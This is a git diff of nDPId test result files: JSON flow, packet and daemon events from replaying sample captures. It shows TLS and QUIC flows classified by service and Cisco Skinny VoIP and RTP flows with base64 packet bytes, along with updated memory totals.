+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495669804,"flow_last_seen":1646495669824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.185.106","src_port":33664,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonVideo","breed":"Acceptable","category":"Video"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495697787,"flow_last_seen":1646495697827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.142","src_port":56458,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleDrive","breed":"Acceptable","category":"Cloud"}} 
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495836963,"flow_last_seen":1646495837006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.185.206","src_port":50608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646568788171,"flow_last_seen":1646568788847,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4237,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":53978,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Pandora","breed":"Fun","category":"Streaming"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1646495710534,"flow_last_seen":1646495710610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6845,"flow_avg_l4_payload_len":684,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.107.42.13","src_port":56836,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.MS_OneDrive","breed":"Acceptable","category":"Cloud"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1646495785326,"flow_last_seen":1646495785351,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2714,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"216.58.212.142","src_port":38642,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495749875,"flow_last_seen":1646495750848,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":4556,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"129.226.107.210","src_port":45014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.IFLIX","breed":"Fun","category":"Video"}} 
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1646495710343,"flow_last_seen":1646495710456,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6565,"flow_avg_l4_payload_len":729,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.81.118.91","src_port":33102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1646495837086,"flow_last_seen":1646495837102,"flow_idle_time":200000,"flow_min_l4_payload_len":1357,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2714,"flow_avg_l4_payload_len":1357,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.181.238","src_port":36832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GooglePlus","breed":"Fun","category":"SocialNetwork"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1646495650748,"flow_last_seen":1646495650832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4927,"flow_avg_l4_payload_len":615,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.113.194.132","src_port":57878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1646495488872,"flow_last_seen":1646495488890,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646568788847,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"15.160.39.187","src_port":45898,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleSiri","breed":"Acceptable","category":"VirtAssistant"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":520,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":520,"packets-processed":520,"total-skipped-flows":0,"total-l4-payload-len":238171,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":43,"total-detection-updates":49,"total-updates":0,"current-active-flows":0,"total-active-flows":47,"total-idle-flows":47,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":338,"global_ts_msec":1646568788847} ~~~~~~~~~~~~~~~~~~~~ 
SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 520/520 @@ -344,9 +344,9 @@ ~~ total active/idle flows...: 47/47 ~~ total timeout flows.......: 4 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6247844 bytes -~~ total memory freed........: 6247844 bytes -~~ total allocations/frees...: 119283/119283 +~~ total memory allocated....: 6381478 bytes +~~ total memory freed........: 6381478 bytes +~~ total allocations/frees...: 122045/122045 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2306 chars diff --git a/test/results/skinny.pcap.out b/test/results/skinny.pcap.out new file mode 100644 index 000000000..63bed70cf --- /dev/null +++ b/test/results/skinny.pcap.out 
@@ -0,0 +1,70 @@ +00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"skinny.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"skinny.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1317801130501} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"skinny.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801130501,"flow_last_seen":1317801130501,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1317801130501,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.12","src_port":49399,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"skinny.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1317801130501,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1317801130501,"pkt":"ABTy5fxCAB56JnR1CABFYABAE3YAAEAGYUrAqMM6wKjBDMD3B9A1u8s7p8yxgFAYIAAcEAAAEAAAABQAAAAmAAAAAQAAAAAAAAAAAAAA"} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"skinny.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801130501,"flow_last_seen":1317801130501,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1317801130501,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.12","src_port":49399,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"skinny.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1317801130503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1317801130503,"pkt":"AB56JnR1ABTy5fxCCABFYABENqhAAD8G\/xPAqMEMwKjDOgfQwPenzLGANbvLU1AYLGqriQAAFAAAABQAAACFAAAAAQAAAAEAAAAAAAAAAAAAAA=="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"skinny.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1317801130503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1317801130503,"pkt":"AB56JnR1ABTy5fxCCABFYAA4NqpAAD8G\/x3AqMEMwKjDOgfQwPenzLGcNbvLU1AYLGq1eQAACAAAABQAAACIAAAAAQAAAA=="} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"skinny.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801130506,"flow_last_seen":1317801130506,"flow_idle_time":7580000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1317801130506,"l3_proto":"ip4","src_ip":"192.168.193.12","dst_ip":"192.168.195.50","src_port":2000,"dst_port":51532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"skinny.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1317801130506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1317801130506,"pkt":"AB1FDGVjABTy5fxCCABFYABM5ZFAAD8GUCrAqMEMwKjDMgfQyUyJcg4lId4l61AYLGoJ+AAAHAAAABQAAAARAQAABAAAAAEAAABLNi4BAAAAAAQAAAAAAAAA"} 
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"skinny.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801130506,"flow_last_seen":1317801130506,"flow_idle_time":7580000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1317801130506,"l3_proto":"ip4","src_ip":"192.168.193.12","dst_ip":"192.168.195.50","src_port":2000,"dst_port":51532,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"skinny.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1317801130506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1317801130506,"pkt":"AB1FDGVjABTy5fxCCABFYABE5ZNAAD8GUDDAqMEMwKjDMgfQyUyJcg5JId4l61AYLGoX3AAAFAAAABQAAAAQAQAAAQAAAEs2LgEDAAAA\/\/\/\/\/w=="} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"skinny.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1317801130506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1317801130506,"pkt":"AB1FDGVjABTy5fxCCABFYABI5ZVAAD8GUCrAqMEMwKjDMgfQyUyJcg5lId4l61AYLGr9cQAAGAAAABQAAABFAQAAAAAAAAEAAABLNi4BgBczMjEAAAA="} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"skinny.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134322,"flow_last_seen":1317801134322,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134322,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.24","src_port":32150,"dst_port":9395,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"skinny.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1317801134322,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134322,"pkt":"ABTy5fxCAB56JnR1CABFuADIE4MAAEARYEbAqMM6wKjBGH2WJLMAtK8pgIAFmwAC4MD2v1fi\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/39+\/v18ffz+\/f9+\/n17eXh6e357fv1+\/v59\/fx9fX16e379+vv7+359fnv\/\/X3+\/35\/e3v+\/H7\/fnv+fXz9\/v7+fX18fHx7fHt+f3\/\/fv3+f\/7+\/v79\/\/5\/eXt8fX9+f\/\/\/\/39+f3x5e3x6eX1+fv5+f\/78\/P78\/nz+fn5+fA=="} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"skinny.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134322,"flow_last_seen":1317801134322,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134322,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.24","src_port":32150,"dst_port":9395,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
+00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"skinny.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134322,"flow_last_seen":1317801134322,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134322,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.195.50","src_port":32144,"dst_port":17718,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"skinny.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1317801134322,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134322,"pkt":"AB1FDGVjAB56JnR1CABFuADIE4QAAEARXivAqMM6wKjDMn2QRTYAtIyXgIAFnAAC4MD2v1fc\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/39+\/v18ffz+\/f9+\/n17eXh6e357fv1+\/v59\/fx9fX16e379+vv7+359fnv\/\/X3+\/35\/e3v+\/H7\/fnv+fXz9\/v7+fX18fHx7fHt+f3\/\/fv3+f\/7+\/v79\/\/5\/eXt8fX9+f\/\/\/\/39+f3x5e3x6eX1+fv5+f\/78\/P78\/nz+fn5+fA=="} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"skinny.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134322,"flow_last_seen":1317801134322,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134322,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.195.50","src_port":32144,"dst_port":17718,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
+00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"skinny.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1317801134323,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134323,"pkt":"AB1FDGVjAB56JnR1CABFuADIE4QAAEARXivAqMM6wKjDMn2QRTYAtIyXgIAFnAAC4MD2v1fc\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/39+\/v18ffz+\/f9+\/n17eXh6e357fv1+\/v59\/fx9fX16e379+vv7+359fnv\/\/X3+\/35\/e3v+\/H7\/fnv+fXz9\/v7+fX18fHx7fHt+f3\/\/fv3+f\/7+\/v79\/\/5\/eXt8fX9+f\/\/\/\/39+f3x5e3x6eX1+fv5+f\/78\/P78\/nz+fn5+fA=="} +00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"skinny.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1317801134342,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134342,"pkt":"ABTy5fxCAB56JnR1CABFuADIE4UAAEARYETAqMM6wKjBGH2WJLMAtJrugAAFnAAC4WD2v1fifX38\/v34\/Pr7f\/9+fnl2eHv\/\/f3+fH5\/ff5\/\/v17fHx6fH1+\/Pt+\/39+\/v\/9f\/\/+fv59e357enx7fX1+\/f78+359fXt6\/\/19\/Pv\/\/X97fP79\/v7+\/3t4e3x8\/\/3+\/f\/8+Px\/fHh4d3l8ff5\/eHt9\/vr7+Pn9fnp6eHl7fP37+vz8\/P38fv3+eHp3c3d6fn7\/\/nz8\/P77\/fv+\/ff++\/t7+w=="} 
+00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"skinny.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1317801134342,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134342,"pkt":"AB1FDGVjAB56JnR1CABFuADIE4YAAEARXinAqMM6wKjDMn2QRTYAtHhcgAAFnQAC4WD2v1fcfX38\/v34\/Pr7f\/9+fnl2eHv\/\/f3+fH5\/ff5\/\/v17fHx6fH1+\/Pt+\/39+\/v\/9f\/\/+fv59e357enx7fX1+\/f78+359fXt6\/\/19\/Pv\/\/X97fP79\/v7+\/3t4e3x8\/\/3+\/f\/8+Px\/fHh4d3l8ff5\/eHt9\/vr7+Pn9fnp6eHl7fP37+vz8\/P38fv3+eHp3c3d6fn7\/\/nz8\/P77\/fv+\/ff++\/t7+w=="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"skinny.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134348,"flow_last_seen":1317801134348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134348,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.193.24","src_port":17726,"dst_port":9399,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"skinny.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1317801134348,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134348,"pkt":"ABTy5fxCAB1FDGVjCABFuADIE+YAAEARX+vAqMMywKjBGEU+JLcAtEN5gIAGQwAFh3h8EHHo\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f358fX17fv96f\/18fX7+\/X9+fn\/+fHz\/fX5\/fn9+\/39+\/\/7+fv7\/fX17fP56d3h6\/X17eXh8fH\/9fnp5ffr2+\/79\/f3+\/3x4eXx6eHx5eX56fH5+f3t+fXp8fH98ffx+\/3t7+n57ff76\/v9\/fH39f3p9fX58ev5+fHp8+Pn8\/Q=="} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"skinny.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134348,"flow_last_seen":1317801134348,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134348,"l3_proto":"ip4","src_ip":"192.168.195.50","dst_ip":"192.168.193.24","src_port":17726,"dst_port":9399,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"skinny.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134349,"flow_last_seen":1317801134349,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134349,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.24","src_port":32152,"dst_port":9396,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"skinny.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1317801134349,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1317801134349,"pkt":"ABTy5fxCAB56JnR1CABFuADIE4cAAEARYELAqMM6wKjBGH2YJLQAtKCZgIAFlAAFh3geBjsi\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f358fX17fv96f\/18fX7+\/X9+fn\/+fHz\/fX5\/fn9+\/39+\/\/7+fv7\/fX17fP56d3h6\/X17eXh8fH\/9fnp5ffr2+\/79\/f3+\/3x4eXx6eHx5eX56fH5+f3t+fXp8fH98ffx+\/3t7+n57ff76\/v9\/fH39f3p9fX58ev5+fHp8+Pn8\/Q=="} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"skinny.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317801134349,"flow_last_seen":1317801134349,"flow_idle_time":200000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1317801134349,"l3_proto":"ip4","src_ip":"192.168.195.58","dst_ip":"192.168.193.24","src_port":32152,"dst_port":9396,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}} 
